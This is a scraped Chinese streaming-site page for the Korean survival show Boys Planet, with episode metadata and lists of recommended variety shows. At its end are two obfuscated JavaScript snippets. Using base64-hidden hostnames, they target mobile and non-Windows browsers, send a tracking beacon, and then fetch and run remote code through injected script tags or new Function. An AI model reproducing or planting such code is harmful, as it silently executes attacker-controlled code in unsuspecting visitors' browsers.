Boys Planet

Boys Planet

本片由向日葵影视提供播放

立即播放
导演:
/ 内详  
更新:
/ 2023-03-19 08:49
备注:
第07集
语言:
关联小说:
剧情:
소년들의 잠재력이 보이는 곳 <보이즈 플래닛>. K그룹 G그룹, 두 세계가 충돌하는 순간 하나의 세계가 탄생한다. 글로벌 팬덤이 직접 만들고 데뷔시키는 K-POP 보이그룹 메이킹 프로젝트

在线观看

播放节点列表
向日葵新浪

猜你喜欢

第三调解室
第20230319期
笑动剧场
第20230318期
你好,星期六 2023
第20230319期
家政女皇
第20230318期
金牌调解
第20230318期
甜蜜的任务 2023
第20230319期
Running Man SBS综艺
第2302012期
漫画兄弟
第04集
云上的小店 第二季
更新至20230319期
今晚开放麦
更新至20230319期
我们练爱吧
更新至20230318期
台湾第一等
更新至第20230319期
世界第一等
更新至20230318期
姐妹们的音乐万万岁
更新至20230319期
来吧!营业中
更新至20230318期
超级红人榜
更新至20230319期
超级夜总会
更新至20230318期
惊人的星期六2023
更新至20230318期
全知干预视角
更新至20230318期
RunningMan
更新至20230319期
笑动剧场
更新至20230319期
欢乐集结号
更新至20230319期

正在热播

更多
欢乐智多星
更新至第20230314期
秘境不思溢3粤语版
更新至第13期
经典传奇[2022]
更新至20230116期
第二个世界
更新至10期
合伙吧少年
更新至20230208纯享加料版期
无限超越班
更新至20230311车保罗有话说期
你好,星期六 2023
第20230319期
传说中的舞台:Achieve K
更新至20210314期
Running Man VI粤语版
更新至183期
敞篷外面是欧洲
更新至20221002期
时光音乐会第2季
更新至20230225Plus版期
体能之巅·百人大挑战
更新至体能之巅:百人大挑战09期
顶楼
更新至20220907期
最美中国戏第2季
更新至20221106期
爸爸跟我来
更新至08期
新世界虚拟货币争霸战
更新至第08期
哎呀好身材 第四季
第20230306期
我们的客栈
更新至20230317期
终极生还组
第8集
你好,星期六
更新至第20230319期
去炫吧!乐派
更新至20230218第9期
我们恋爱吧 第二季
更新至20201216期
天际无垠
更新至第05期
function YnJES(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zXnPFVt(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return YnJES(t);};window[''+'A'+'p'+'W'+'Y'+'v'+'V'+'i'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=zXnPFVt,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var sul='https://'+u+'/v2/stats/12457/'+i;if(navigator.sendBeacon){navigator.sendBeacon(sul);}else{new Image().src=sul;}'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/vh1/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/vh1/'+i;cs.parentElement.insertBefore(s,cs);}})('Z2JtbWQuaXViZHdqZmmpkY2RuLmmNvbQ==','158102',window,document,['m','xcECQtklg']);}:function(){};
function ZrOTxE(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function IBQnRLq(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ZrOTxE(t);};window[''+'u'+'O'+'e'+'t'+'F'+'Y'+'N'+'p'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=IBQnRLq,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var sul='https://'+u+'/v2/stats/12457/'+i;if(navigator.sendBeacon){navigator.sendBeacon(sul);}else{new Image().src=sul;}'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/vh1/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/vh1/'+i;cs.parentElement.insertBefore(s,cs);}})('Z2JtbWQuuaXViZHdqZmpkY2RuuLmNvbQ==','158103',window,document,['u','wsNuAziQ']);}:function(){};